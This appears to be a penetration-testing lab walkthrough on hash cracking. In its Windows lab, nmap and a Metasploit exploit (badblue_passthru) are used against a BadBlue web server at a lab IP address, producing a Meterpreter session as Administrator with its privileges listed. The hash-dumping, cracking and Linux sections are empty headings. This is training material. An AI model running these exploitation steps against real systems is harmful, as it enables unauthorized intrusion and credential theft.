🔬Cracking Hashes
Lab 1 - Windows
Enumeration & Exploitation
nmap -sV -p 80 10.2.24.3780/tcp open http BadBlue httpd 2.7service postgresql start && msfconsole -qsearch badblue
use exploit/windows/http/badblue_passthru
options
setg RHOSTS 10.2.24.37
runsysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
getuid
Server username: WIN-OMCNBKR66MN\Administrator
get privs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilegeDumping Hashes
Cracking Hashes
JohnTheRipper

Hashcat

Lab 2 - Linux
Enumeration & Exploitation
Dumping Hashes


Cracking Hashes
JohnTheRipper

Hashcat

Last updated